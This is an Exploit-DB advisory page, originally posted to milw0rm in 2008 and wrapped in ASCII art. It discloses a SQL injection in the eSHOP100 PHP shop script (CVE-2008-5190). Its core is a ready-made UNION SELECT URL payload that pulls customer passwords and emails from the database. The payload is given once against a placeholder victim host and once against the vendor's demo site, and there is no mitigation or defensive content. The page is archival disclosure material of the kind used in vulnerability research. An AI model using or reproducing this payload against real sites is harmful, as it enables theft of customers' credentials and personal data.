- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5970
- Проверка EDB
-
- Пройдено
- Автор
- JUDGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5190
- Дата публикации
- 2008-06-30
Код:
- , .ss$$$$$$$$$$s,
- $. s$$$$$$$$$$$$$$`$$Ss
- "$$$$$$$$$$$$$$$$$$o$$$ ,
- s$$$$$$$$$$$$$$$$$$$$$$$$s, ,s
- s$$$$$$$$$"$$$$$$""""$$$$$$"$$$$$,
- s$$$$$$$$$$s""$$$$ssssss"$$$$$$$$"
- s$$$$$$$$$$' `"""ss"$"$s""
- s$$$$$$$$$$, `"""""$ .s$$s
- s$$$$$$$$$$$$s,... `s$$' `
- `ssss$$$$$$$$$$$$$$$$$$$$####s. .$$"$. , s-
- `""""$$$$$$$$$$$$$$$$$$$$#####$$$$$$" $.$'
- "$$$$$$$$$$$$$$$$$$$$$####s"" .$$$|
- "$$$$$$$$$$$$$$$$$$$$$$$$##s .$$" $
- $$""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" `
- $$" "$"$$$$$$$$$$$$$$$$$$$$S""""'
- , ," ' $$$$$$$$$$$$$$$$####s
- $. .s$$$$$$$$$$$$$$$$$####"
- "$s. ..ssS$$$$$$$$$$$$$$$$$$$####"
- .$$$S$$$$$$$$$$$$$$$$$$$$$$$$#####"
- ..sS$$$$$$$$$$$$$$$$$$$$$$$$$$$######""
- "$$sS$$$$$$$$$$$$$$$$$$$$$$$$$$$########"
- , s$$$$$$$$$$$$$$$$$$$$$$$$#########""'
- $ s$$$$$$$$$$$$$$$$$$$$$#######""' s' ,
- $$..$$$$$$$$$$$$$$$$$$######"' ....,$$.... ,$
- "$$$$$$$$$$$$$$$######"' , .sS$$$$$$$$$$$$$$$$s$$
- $$$$$$$$$$$$#####" $, .s$$$$$$$$$$$$$$$$$$$$$$$$s.
- ) $$$$$$$$$$$#####' `$$$$$$$$$###########$$$$$$$$$$$.
- (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$
########################################################################
# #
# ...:::::eSHOP100 SQL Injection Vulnerbility ::::.... #
########################################################################
## AUTHOR : JuDge
## AUTHOR Email:[email protected],[email protected]
## Script WebSite:http://www.eshop100.co.uk
##Dork::)
##DescRipTiON: pull customers info from database
##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
=======================================================================================================================================
## thx to : All My FrienDs
i'm Not a HaCker
- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s'
- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' )
- (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$
- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s'
- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$'
- ) ( ( $$"$$$$$$$$$$$#####.$$$$$###' JuDge Da .###$$$$$$$$$$"
- ( ) ) _,$" $$$$$$$$$$$$######.$$##' BeST .###$$$$$$$$$$
- ) ( ( \. "$$$$$$$$$$$$$#######,,,. ..####$$$$$$$$$$$"
- ( )$ ) ) ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$"
- ( ($$ ( \ _sS" `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$,
- ) )$$$s ) ) . . `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"' `$$
- ( $$$Ss/ .$, .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S"" '
- \)_$$$$$$$$$$$$$$$$$$$$$$$##" $$ `$$. `$$.
- `"S$$$$$$$$$$$$$$$$$#" $ `$ `$
- `"""""""""""""' ' ' '
# milw0rm.com [2008-06-30]
- Источник
- www.exploit-db.com